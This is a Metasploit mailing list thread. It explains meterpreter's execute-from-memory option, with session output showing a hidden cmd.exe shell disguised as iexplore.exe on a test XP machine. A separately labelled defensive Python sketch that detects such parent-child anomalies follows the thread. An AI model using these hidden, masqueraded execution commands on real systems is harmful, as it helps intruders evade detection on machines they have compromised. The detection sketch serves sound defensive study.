Metasploit mailing list archives

meterpreter execute from memory


From: reydecopas at gmail.com (reydecopas)
Date: Tue, 3 Feb 2009 16:19:03 +0100

Ok, clear enough...
-f local_EXE_file

meterpreter > execute -f cmd.exe -H -i -m -d c:\\progra~1\\intern~1\\iexplore.exe
Process 176 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\admin\Desktop>tasklist
tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         16 K
System                         4 Console                 0        212 K
smss.exe                     328 Console                 0        372 K
csrss.exe                    584 Console                 0      3,328 K
winlogon.exe                 608 Console                 0      5,096 K
services.exe                 652 Console                 0      3,644 K
savedump.exe                 664 Console                 0      2,388 K
lsass.exe                    672 Console                 0      1,308 K
svchost.exe                  824 Console                 0      4,284 K
svchost.exe                  892 Console                 0      3,728 K
svchost.exe                  988 Console                 0     15,736 K
svchost.exe                 1048 Console                 0      2,844 K
svchost.exe                 1200 Console                 0      4,184 K
explorer.exe                1400 Console                 0     16,448 K
spoolsv.exe                 1540 Console                 0      4,064 K
VBoxTray.exe                1640 Console                 0      1,896 K
VBoxService.exe             1972 Console                 0      1,260 K
wscntfy.exe                  492 Console                 0      1,736 K
alg.exe                      832 Console                 0      3,144 K
wuauclt.exe                 1444 Console                 0      6,232 K
met-rev.exe                 1668 Console                 0      3,084 K
procexp.exe                 1580 Console                 0      6,604 K
wmiprvse.exe                1936 Console                 0      5,588 K
IEXPLORE.EXE                 176 Console                 0      1,516 K
tasklist.exe                2036 Console                 0      3,964 K

C:\Documents and Settings\admin\Desktop>





On Tue, Feb 3, 2009 at 3:32 PM, reydecopas <reydecopas at gmail.com> wrote:

Hi,
I don't understand the parameters of the execute command (-d -m)

This works perfectly:

meterpreter > execute -f cmd.exe -H -i
Process 1220 created.
Channel 33 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\admin\Desktop>


but when does it make sense to use the -d and -m parameters?
Can anyone send an example?

meterpreter > execute -h
Usage: execute -f file [options]

Executes a command on the remote machine.

OPTIONS:

    -H        Create the process hidden from view.
    -a <opt>  The arguments to pass to the command.
    -c        Channelized I/O (required for interaction).
    -d <opt>  The 'dummy' executable to launch when using -m.
    -f <opt>  The executable command to run.
    -h        Help menu.
    -i        Interact with the process after creating it.
    -m        Execute from memory.
    -t        Execute process with currently impersonated thread token




I get this error:
meterpreter > execute -f cmd.exe -H -i  -d calc.exe -m
[-] Error running command execute: No such file or directory - cmd.exe
/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in `initialize'
/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in `new'
/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in `execute'
/home/user/metasploit/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:120:in `cmd_execute'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
/home/user/metasploit/lib/rex/ui/text/shell.rb:123:in `call'
/home/user/metasploit/lib/rex/ui/text/shell.rb:123:in `run'
/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
/home/user/metasploit/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'
/home/user/metasploit/lib/rex/ui/interactive.rb:48:in `interact'
/home/user/metasploit/lib/msf/ui/console/command_dispatcher/core.rb:918:in `cmd_sessions'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/user/metasploit/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/user/metasploit/lib/rex/ui/text/shell.rb:127:in `run'
./msfconsole:82
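
The session above as seen from the defender's side, as an added example that is not part of the original post: in the tasklist output the shell shows up as IEXPLORE.EXE (PID 176) and no cmd.exe is listed, so the image name alone is not a reliable signal, but the parent/child links around that process are. The PIDs and image names are taken from the listing; the parent PIDs, the image sets and the function name are assumptions made for this sketch.

```python
# Constructed sample: process-creation records shaped like the listing in the
# post. PIDs and image names come from the tasklist output; the parent PIDs
# are assumptions (tasklist does not print them).
EVENTS = [
    # (pid, ppid, image)
    (1400, 1360, "explorer.exe"),
    (1668, 1400, "met-rev.exe"),
    (1580, 1400, "procexp.exe"),
    (176, 1668, "IEXPLORE.EXE"),
    (2036, 176, "tasklist.exe"),
]

# Images that normally own a window and are started from the user's shell.
GUI_IMAGES = {"iexplore.exe"}
EXPECTED_PARENTS = {"explorer.exe", "iexplore.exe"}
# Console utilities a browser has no routine reason to spawn.
CONSOLE_TOOLS = {"cmd.exe", "tasklist.exe", "net.exe", "ipconfig.exe"}


def find_anomalies(events):
    """Return (pid, image, reason) for parent/child pairs that do not fit a GUI image."""
    by_pid = {pid: image.lower() for pid, _ppid, image in events}
    findings = []
    for pid, ppid, image in events:
        name = image.lower()
        parent = by_pid.get(ppid, "<unknown>")
        # Rule 1: a browser image started by something other than the shell.
        if name in GUI_IMAGES and parent not in EXPECTED_PARENTS:
            findings.append((pid, image, f"started by {parent}"))
        # Rule 2: a console utility whose parent claims to be a browser.
        if name in CONSOLE_TOOLS and parent in GUI_IMAGES:
            findings.append((pid, image, f"console tool spawned by {parent}"))
    return findings


if __name__ == "__main__":
    for pid, image, reason in find_anomalies(EVENTS):
        print(f"PID {pid:>5} {image:<14} {reason}")
```
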








